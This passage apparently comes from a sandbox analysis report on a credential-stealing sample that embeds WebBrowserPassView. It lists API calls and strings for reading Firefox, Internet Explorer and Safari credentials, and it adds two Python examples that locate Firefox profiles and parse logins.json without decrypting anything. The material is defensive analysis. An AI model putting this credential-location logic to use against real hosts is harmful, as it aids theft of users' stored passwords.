                                                                                                                                                                  • OpenClipboard.USER32 ref: 0040F0B6
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040F0CB
                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040F0EA
                                                                                                                                                                    • Part of subcall function 00407F9A: EmptyClipboard.USER32 ref: 00407FA4
                                                                                                                                                                    • Part of subcall function 00407F9A: GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
                                                                                                                                                                    • Part of subcall function 00407F9A: GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
                                                                                                                                                                    • Part of subcall function 00407F9A: GlobalLock.KERNEL32 ref: 00407FDF
                                                                                                                                                                    • Part of subcall function 00407F9A: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
                                                                                                                                                                    • Part of subcall function 00407F9A: GlobalUnlock.KERNEL32(00000000), ref: 00408004
                                                                                                                                                                    • Part of subcall function 00407F9A: SetClipboardData.USER32 ref: 0040800D
                                                                                                                                                                    • Part of subcall function 00407F9A: CloseHandle.KERNEL32(?), ref: 00408021
                                                                                                                                                                    • Part of subcall function 00407F9A: CloseClipboard.USER32 ref: 00408035
                                                                                                                                                                  Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
• String ID:
• API String ID: 2633007058-0
• Opcode ID: dbdd240ec4c17506c233b057a251f0f9826ab019b5c58cf36240f842d410ce54
• Instruction ID: d4411bd4de1fade650879fa69a29e8aba7a0aa0f0e0d1894cd1391532f6ebd18
• Opcode Fuzzy Hash: dbdd240ec4c17506c233b057a251f0f9826ab019b5c58cf36240f842d410ce54
• Instruction Fuzzy Hash: 4CF0A4357003006BEA3027359C0EF9B375DDB80714F00453AF852A65D3EE79E8898568
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
• Instruction ID: e5ecc73df534455334d47becca92420b288d3786a246e23e5c2a841cda36e69b
• Opcode Fuzzy Hash: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
• Instruction Fuzzy Hash: 17C08C329112208BDB11AB08FE0A7CD72989B0B727F014077E802A2252C7F848048BBC
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 0040233E
• _wcsicmp.MSVCRT ref: 0040236E
• _wcsicmp.MSVCRT ref: 0040239B
• _wcsicmp.MSVCRT ref: 004023C8
  • Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
  • Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75
• memset.MSVCRT ref: 0040276C
• memcpy.MSVCRT ref: 004027A1
  • Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
  • Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
  • Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD
• memcpy.MSVCRT ref: 004027FD
• LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040285B
• FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040286A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 462158748-1134094380
• Opcode ID: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
• Instruction ID: 2d0d0591d6411435ed5b4a397348faa82e1f821ad6e98c1f3977ba2ad668a768
• Opcode Fuzzy Hash: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
• Instruction Fuzzy Hash: FBF1F2218087E9C9DB32C7788C097DEBE655B23324F0443D9D1E87A2D2D7B94B85CB66
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
• API String ID: 2787044678-1843504584
• Opcode ID: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
• Instruction ID: f322a3b8e7f5a6d162087a7bfffa82d5495360e728e73a59fe9151b9b78652c6
• Opcode Fuzzy Hash: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
• Instruction Fuzzy Hash: 8191B271500219ABEF20DF55CC45FEF776DAF91314F01046AF948A7181EA3CEDA48B69
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
• Opcode ID: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
• Instruction ID: eaed71e83b935c0691042ece96cd3f4181ba93c5b62309cd5e6c1ba419c0f7d3
• Opcode Fuzzy Hash: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
• Instruction Fuzzy Hash: 8AB1CE71108701AFDB21DFA8C985A6BBBF9FB88704F004A2EF59582261DB75E904CF56
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID: WebBrowserPassView
• API String ID: 829165378-2171583229
• Opcode ID: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
• Instruction ID: da1635bf63897f0d85a147e608c4a0468d220b7f7222c61bbc2b07ca64c81474
• Opcode Fuzzy Hash: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
• Instruction Fuzzy Hash: 4751BF34500B08EBDF22AF60CC45E6E7BB5FB04341F104A3AF952A65F1C7B9A950EB18
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040AE5E: GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
  • Part of subcall function 0040AE5E: CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC
  • Part of subcall function 0040AF0C: _wcsicmp.MSVCRT ref: 0040AF46
• memset.MSVCRT ref: 004071FD
• memset.MSVCRT ref: 00407212
• _wtoi.MSVCRT ref: 00407306
• _wcsicmp.MSVCRT ref: 0040731A
• memset.MSVCRT ref: 0040733B
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?), ref: 0040736F
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00407386
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040739D
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073B4
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073CB
  • Part of subcall function 00407150: _wtoi64.MSVCRT ref: 00407154
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073E2
  • Part of subcall function 00406FCE: memset.MSVCRT ref: 00406FF4
  • Part of subcall function 00406FCE: memset.MSVCRT ref: 00407008
  • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
  • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
  • Part of subcall function 00406FCE: strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
  • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
  • Part of subcall function 00406FCE: wcscpy.MSVCRT ref: 0040709D
  • Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
  • Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ByteCharMultiWide$memset$strcpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
• String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$logins$null$passwordField$timeCreated$timeLastUsed$timePasswordChanged$timesUsed$usernameField${@
• API String ID: 249851626-1964116028
• Opcode ID: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
• Instruction ID: c3ecdf3b596e70815539cea729ffc079dd9e4b065ea23c8e33f814b0aa12875c
• Opcode Fuzzy Hash: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
• Instruction Fuzzy Hash: 48717FB1D40219AEEF10EBA2DC82DEEB778EF40318F1041BBB514B61D1DA785E548F69
Uniqueness
• Uniqueness Score: -1.00%
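
The strings referenced by the function above (logins, hostname, httpRealm, encryptedUsername, encryptedPassword, usernameField, passwordField, timeCreated, timeLastUsed, timePasswordChanged, timesUsed, and the literal null) are the keys of Firefox's logins.json login store, and the API pattern matches a parser of that file: _wtoi64 for the millisecond timestamps, _wtoi for timesUsed, and WideCharToMultiByte with code page 0000FDE9 (65001, CP_UTF8) to convert each field. The block below is an added example, not code from the analysed sample, from NirSoft or from the sandbox report: it parses a constructed logins.json with the same fields so a responder can see exactly what a stealer obtains from that file. The sample file content and its placeholder base64 blobs are constructed and are not real NSS ciphertext.

```python
"""Parser for the Firefox logins.json login store, reading the same fields
the password-recovery code referenced above reads.

Added example; not code from the analysed sample or from NirSoft.
"""
import json
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List, Optional

# Constructed sample of a logins.json file. In a real profile the two
# encrypted fields are base64 DER blobs sealed with the NSS key kept in
# key4.db; these values are placeholders (base64 of "PLACEHOLDER-...").
SAMPLE_LOGINS_JSON = json.dumps({
    "nextId": 3,
    "logins": [
        {
            "id": 1,
            "hostname": "https://example.test",
            "httpRealm": None,                  # form login: realm is null
            "formSubmitURL": "https://example.test",
            "usernameField": "user",
            "passwordField": "pass",
            "encryptedUsername": "UExBQ0VIT0xERVItVVNFUg==",
            "encryptedPassword": "UExBQ0VIT0xERVItUEFTUw==",
            "guid": "{00000000-0000-0000-0000-000000000001}",
            "encType": 1,
            "timeCreated": 1633046400000,       # ms since the Unix epoch
            "timeLastUsed": 1633132800000,
            "timePasswordChanged": 1633046400000,
            "timesUsed": 4,
        },
        {
            "id": 2,
            "hostname": "ftp://files.example.test",
            "httpRealm": "Restricted Area",     # HTTP/FTP auth: realm is set
            "formSubmitURL": None,
            "usernameField": "",
            "passwordField": "",
            "encryptedUsername": "UExBQ0VIT0xERVItVVNFUg==",
            "encryptedPassword": "UExBQ0VIT0xERVItUEFTUw==",
            "guid": "{00000000-0000-0000-0000-000000000002}",
            "encType": 1,
            "timeCreated": 1600000000000,
            "timeLastUsed": 1600000000000,
            "timePasswordChanged": 1600000000000,
            "timesUsed": 0,
        },
    ],
    "version": 3,
})


@dataclass
class FirefoxLogin:
    hostname: str
    http_realm: Optional[str]
    username_field: str
    password_field: str
    encrypted_username: str
    encrypted_password: str
    time_created: datetime
    time_last_used: datetime
    time_password_changed: datetime
    times_used: int


def _ms_to_utc(value: int) -> datetime:
    """Timestamps are milliseconds since the epoch; they exceed 32 bits,
    which is why the native code reads them with _wtoi64 rather than _wtoi."""
    return datetime.fromtimestamp(value / 1000, tz=timezone.utc)


def parse_logins_json(text: str) -> List[FirefoxLogin]:
    """Return one record per entry of the top-level "logins" array."""
    doc = json.loads(text)
    entries = doc.get("logins") if isinstance(doc, dict) else None
    if not isinstance(entries, list):
        raise ValueError("not a Firefox logins.json: no 'logins' array")
    logins = []
    for e in entries:
        logins.append(FirefoxLogin(
            hostname=e["hostname"],
            # JSON null becomes None here; the native code instead compares
            # the raw token against the string "null", hence that literal.
            http_realm=e.get("httpRealm"),
            username_field=e.get("usernameField", ""),
            password_field=e.get("passwordField", ""),
            encrypted_username=e["encryptedUsername"],
            encrypted_password=e["encryptedPassword"],
            time_created=_ms_to_utc(int(e.get("timeCreated", 0))),
            time_last_used=_ms_to_utc(int(e.get("timeLastUsed", 0))),
            time_password_changed=_ms_to_utc(int(e.get("timePasswordChanged", 0))),
            times_used=int(e.get("timesUsed", 0)),
        ))
    return logins


def summarize(text: str) -> List[dict]:
    """Rows in the shape a recovery tool would display, minus the cleartext:
    without the profile's key4.db the encrypted fields stay opaque."""
    rows = []
    for login in parse_logins_json(text):
        rows.append({
            "url": login.hostname,
            "realm": login.http_realm or "",
            "encrypted_username_len": len(login.encrypted_username),
            "created_utc": login.time_created.isoformat(),
            "last_used_utc": login.time_last_used.isoformat(),
            "times_used": login.times_used,
        })
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE_LOGINS_JSON):
        print(row)
```

The encrypted fields are left opaque on purpose: the function listed above references no NSS key handling, and decrypting those blobs requires the profile's key4.db (and the master password, if one is set). For incident response the timestamps are the useful part: timeLastUsed and timePasswordChanged bound how current each stolen credential was when deciding what to rotate first.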

APIs
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0041166F
• {Unknown}, xrefs: 00411492
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
• Opcode ID: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
• Instruction ID: 77b13c0c11c75301577e42814f96b51b4b1d428f570956a2458bc96a91f7f52b
• Opcode Fuzzy Hash: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
• Instruction Fuzzy Hash: A17193B280021CBFEF219B51DD45EDA376DEB49355F04407BF608A2162EB79DE848F68
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00411781
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
                                                                                                                                                                  • memset.MSVCRT ref: 004117F1
                                                                                                                                                                  • wcslen.MSVCRT ref: 004117FE
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041180D
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 004118CC
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 004118D8
                                                                                                                                                                    • Part of subcall function 00406B51: memset.MSVCRT ref: 00406B72
                                                                                                                                                                    • Part of subcall function 00406B51: memset.MSVCRT ref: 00406BBF
                                                                                                                                                                    • Part of subcall function 00406B51: RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
                                                                                                                                                                    • Part of subcall function 00406B51: wcscpy.MSVCRT ref: 00406D07
                                                                                                                                                                    • Part of subcall function 00406B51: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
                                                                                                                                                                    • Part of subcall function 00406B51: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                                                                                                                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                  • API String ID: 2554026968-4029219660
                                                                                                                                                                  • Opcode ID: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
                                                                                                                                                                  • Instruction ID: 97ddbdf8ae905254a000a89cdfb80c97087349b9056a3f7eb9cac2f120fabdad
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
                                                                                                                                                                  • Instruction Fuzzy Hash: D2419271940308ABDB20AF61CC85E9AB7F8FF58344F10486FE295D3151EBB8D9848B5C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00411760: memset.MSVCRT ref: 00411781
                                                                                                                                                                    • Part of subcall function 00411760: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
                                                                                                                                                                    • Part of subcall function 00411760: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
                                                                                                                                                                    • Part of subcall function 00411760: memset.MSVCRT ref: 004117F1
                                                                                                                                                                    • Part of subcall function 00411760: wcslen.MSVCRT ref: 004117FE
                                                                                                                                                                    • Part of subcall function 00411760: wcslen.MSVCRT ref: 0041180D
                                                                                                                                                                    • Part of subcall function 00411760: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
                                                                                                                                                                    • Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
                                                                                                                                                                    • Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
                                                                                                                                                                  • memset.MSVCRT ref: 004079D1
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
                                                                                                                                                                  • memset.MSVCRT ref: 00407A23
                                                                                                                                                                  • memset.MSVCRT ref: 00407A3B
                                                                                                                                                                  • memset.MSVCRT ref: 00407A53
                                                                                                                                                                  • memset.MSVCRT ref: 00407A6B
                                                                                                                                                                  • memset.MSVCRT ref: 00407A83
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407A8E
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407A9C
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407ACB
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407AD9
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B08
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B16
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B45
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B53
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B82
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B90
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB
                                                                                                                                                                    • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                    • Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
                                                                                                                                                                    • Part of subcall function 0040744D: memset.MSVCRT ref: 0040748C
                                                                                                                                                                    • Part of subcall function 0040744D: memset.MSVCRT ref: 0040750B
                                                                                                                                                                    • Part of subcall function 0040744D: memset.MSVCRT ref: 00407520
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$memset$AddressProc$CurrentDirectory$LibraryLoad$AttributesByteCharFileHandleModuleMultiWidewcscatwcscpy
                                                                                                                                                                  • String ID: logins.json$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                                                                                                                  • API String ID: 3287676187-2852686199
                                                                                                                                                                  • Opcode ID: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
                                                                                                                                                                  • Instruction ID: 7d0a504a01980ca961e130c4bf0e7e2836c0561e9ae5ad9b50c10663cf81d5b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F91947180811DABEF11EF51DC41A9E77B8FF44319F1004ABF908E2191EB79AA548B9A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
                                                                                                                                                                  • String ID: General$IsRelative$Path$Profile%d$profiles.ini
                                                                                                                                                                  • API String ID: 3014334669-2600475665
                                                                                                                                                                  • Opcode ID: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
                                                                                                                                                                  • Instruction ID: c42e31a804922eed0ec5ba890dd8b4603cdc71837868ac6ae30ebb97505d8267
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D51557290122CAAEB20EB55CD45FDEB7BCAF55344F1040E7B508A2151EF789B848F99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
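The three function dumps above (resolving NSS_Init / PK11SDR_Decrypt from nss3.dll found via %programfiles%\Mozilla Firefox, probing logins.json / signons.sqlite / signons*.txt with GetFileAttributesW, and walking profiles.ini with the Profile%d / IsRelative / Path strings) are the Firefox credential-recovery path of the embedded WebBrowserPassView component. The following Python is an added example, written here and not code from the sample or from the report, that re-implements the profile discovery and store-file probing so an analyst can see what those strings are used for; it runs offline on a constructed profiles.ini (a made-up sample, not one recovered from the sandbox run) and deliberately does not touch NSS, since decryption needs Firefox's own nss3.dll. The function names, the fake-filesystem callback and the test inputs are assumptions for illustration.

```python
"""Added example: Firefox profile discovery as performed by the dumped functions.
Not the sample's code; reconstructs the logic implied by the strings
General / IsRelative / Path / Profile%d / profiles.ini and the store file names.
"""
import configparser
import os
from typing import Callable, List, Tuple

# Store file names the dumped function probes with GetFileAttributesW.
# logins.json (current), signons.sqlite, then the legacy signons*.txt formats.
CREDENTIAL_FILES = ["logins.json", "signons.sqlite",
                    "signons3.txt", "signons2.txt", "signons.txt"]

# Constructed sample profiles.ini in the layout Firefox writes under
# %APPDATA%\Mozilla\Firefox (made up for this example).
SAMPLE_PROFILES_INI = """[General]
StartWithLastProfile=1

[Profile0]
Name=default
IsRelative=1
Path=Profiles/abcd1234.default

[Profile1]
Name=work
IsRelative=0
Path=D:\\work-profile
"""


def parse_profiles_ini(text: str, ini_dir: str) -> List[Tuple[str, str]]:
    """Return (profile name, profile directory) for every [ProfileN] section.

    Mirrors the loop suggested by the "Profile%d" format string: N = 0, 1, ...
    until the first missing section.  IsRelative=1 means Path is relative to
    the directory holding profiles.ini and uses forward slashes; IsRelative=0
    means Path is already absolute.
    """
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    profiles = []
    n = 0
    while True:
        section = "Profile%d" % n
        if not cfg.has_section(section):
            break
        path = cfg.get(section, "Path", fallback="")
        is_relative = cfg.get(section, "IsRelative", fallback="1") == "1"
        if is_relative:
            path = os.path.join(ini_dir, *path.split("/"))
        name = cfg.get(section, "Name", fallback=section)
        profiles.append((name, os.path.normpath(path)))
        n += 1
    return profiles


def credential_store_candidates(profile_dir: str) -> List[str]:
    """Every store path the sample would build for one profile directory."""
    return [os.path.join(profile_dir, f) for f in CREDENTIAL_FILES]


def find_existing_stores(profile_dir: str,
                         exists: Callable[[str], bool] = os.path.exists) -> List[str]:
    """The GetFileAttributesW probe: which of the candidate files are present.

    `exists` is injectable (hypothetical parameter) so the logic can be
    exercised against a fake filesystem without a real Firefox install.
    """
    return [p for p in credential_store_candidates(profile_dir) if exists(p)]


if __name__ == "__main__":
    # Assumed location; on a live host this is %APPDATA%\Mozilla\Firefox.
    for name, pdir in parse_profiles_ini(SAMPLE_PROFILES_INI, "/fx"):
        print(name, pdir, find_existing_stores(pdir))
```

For DFIR use the same enumeration tells you which profile directories and which of the five store files to preserve from a host where this sample ran; the presence of signons*.txt alongside logins.json is what distinguishes an old, migrated profile from a fresh one.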

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040B5D4: LoadMenuW.USER32 ref: 0040B5DC
                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040EC7A
                                                                                                                                                                  • CreateStatusWindowW.COMCTL32(50000000,Function_0004552C,?,00000101), ref: 0040EC95
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040ECAD
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040ECBC
                                                                                                                                                                  • LoadImageW.USER32 ref: 0040ECC9
                                                                                                                                                                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040ECF3
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040ED00
                                                                                                                                                                  • CreateWindowExW.USER32 ref: 0040ED27
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040EDEF
                                                                                                                                                                  • ShowWindow.USER32(?,?), ref: 0040EE25
